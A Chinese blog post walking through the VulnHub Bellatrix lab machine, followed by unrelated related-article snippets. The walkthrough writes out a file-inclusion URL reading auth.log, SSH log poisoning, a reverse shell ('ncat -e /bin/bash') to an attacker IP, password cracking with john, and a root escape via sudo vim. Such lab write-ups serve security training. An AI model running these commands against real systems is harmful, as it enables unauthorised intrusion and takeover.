vulnhub之Bellatrix的实践

VSole2022-07-30 13:33:28

今天实践的是vulnhub的Bellatrix镜像,

下载地址,https://download.vulnhub.com/hogwarts/Bellatrix.ova,

用workstation导入成功,进行地址扫描,拿到地址192.168.58.143,

接着进行端口扫描,sudo nmap -sS -sV -T5 -A -p- 192.168.58.143,

看到有http服务,浏览器访问主页,发现提示php页面,

再查看源码,提示了文件包含漏洞,

通过文件包含漏洞查看ssh登录日志文件,

http://192.168.58.143/ikilledsiriusblack.php?file=/var/log/auth.log,

向ssh登录日志文件里注入webshell,

ssh ''@192.168.58.143,

再次查看ssh登录日志文件,是看不到已经注入的webshell的,

但其实是注入成功的,后来拿到shell后直接查看ssh登录日志文件就能看到,

kali攻击机上开启反弹shell监听,nc -lvp 4444,

利用webshell制造反弹shell,

http://192.168.58.143/ikilledsiriusblack.php?file=/var/log/auth.log&c=ncat -e /bin/bash 192.168.58.131 4444,

kali攻击机上得到反弹shell,不是root,需要提权,转成交互式shell,

python3 -c 'import pty; pty.spawn("/bin/bash")',

从当前账户文件里发现了一个账户和密码的hash,

在kali攻击机上使用john破解,

sudo john --wordlist=/usr/share/john/password.lst hash,

得到账户密码,lestrange/ihateharrypotter,

切到lestrange账户下,再sudo -l发现vim是root权限的,

老办法,查找vim的提权方法,

提权,sudo vim -c ':!/bin/sh',成功,id确认是root,

shellssh
本作品采用《CC 协议》,转载必须注明作者和本文链接
此时,如果你使用的是Linux系统,可以使用mingw-w64-gcc编译器:CC=x86_64-w64-mingw32-gcc GOOS=windows RSSH_HOMESERVER=192.168.1.1:2343 make client_dll. 当RSSH服务器启用了Webserver之后,我们也可以使用下列命令进行编译:./server --webserver :3232. 这种情况适用于无文件注入的场景。WebhookRSSH服务器可以通过命令行终端接口并使用webhook命令发送原始HTTP请求。
Reverse_SSH上一款基于SSH的反向Shell工具,在该工具的帮助下,广大研究人员可以使用SSH来实现反向Shell
一个新发现的规避恶意软件利用Secure Shell加密协议进入目标系统,目的是挖掘加密货币并实施分布式拒绝服务攻击。
如果被利用,该漏洞可能允许攻击者劫持设备的摄像头和麦克风以监视房主。 安全实验室 Modux 的研究人员发现了 Enabot 的 Ebo Air 智能机器人的一个缺陷,该机器人旨在娱乐您的整个家庭和宠物。根据 Modux 研究人员的发现,攻击者可以通过利用该漏洞并监视居住者/用户来轻松入侵智能机器人。
安全研究人员观察到名为 TellYouThePass 的勒索软件家族尝试利用最近发现的 Log4j 高危漏洞。TellYouThePass 勒索软件家族被认为年代比较悠久且基本不活跃,在广泛使用的 Log4j 日志框架发现漏洞之后,该勒索软件家族再次活跃。研究人员表示,继 Khonsari 勒索软件之后,TellYouThePass 成为第二个被观察到利用 Log4j 漏洞(被称为Log4Shel
网络交换机充当网络的构建模块,促进了局域网(LAN)内的数据流。
ESXI环境搭建和配置
2022-05-09 13:32:39
ESXI环境搭建和配置
近日,负责提供安全数字化体验的智能边缘平台阿卡迈技术公司(Akamai Technologies)推出了可防范网络钓鱼的全新解决方案Akamai MFA,旨在使企业能够快速部署FIDO2多因素身份验证(MFA),而无需部署和管理硬件安全密钥。Akamai MFA使用智能手机应用程序将现有智能手机转变为硬件安全密钥,进而实现流畅的用户体验。
要说哪个网络威胁组织同时具备狡猾的社会工程学能力和灵活的网络安全技术,那就不得不提到Muddled Libra了。由于对企业信息技术有着深入的了解,即使你的组织机构拥有完善的传统网络防御系统,Muddled Libra也会对你产生巨大的威胁。
2021 年,全球因勒索软件造成的损失预计达到 200 亿美元,远高于 2015 年的 3.25 亿美元。恶意流量按照攻击行为可归纳为以下 3 种类型。攻击行为包括扫描探测、暴力破解等。相比按照恶意流量攻击行为划分,学术界更侧重于根据恶意流量的内容特征、数据流特征及网络连接行为特征等具体特征进行划分。
VSole
网络安全专家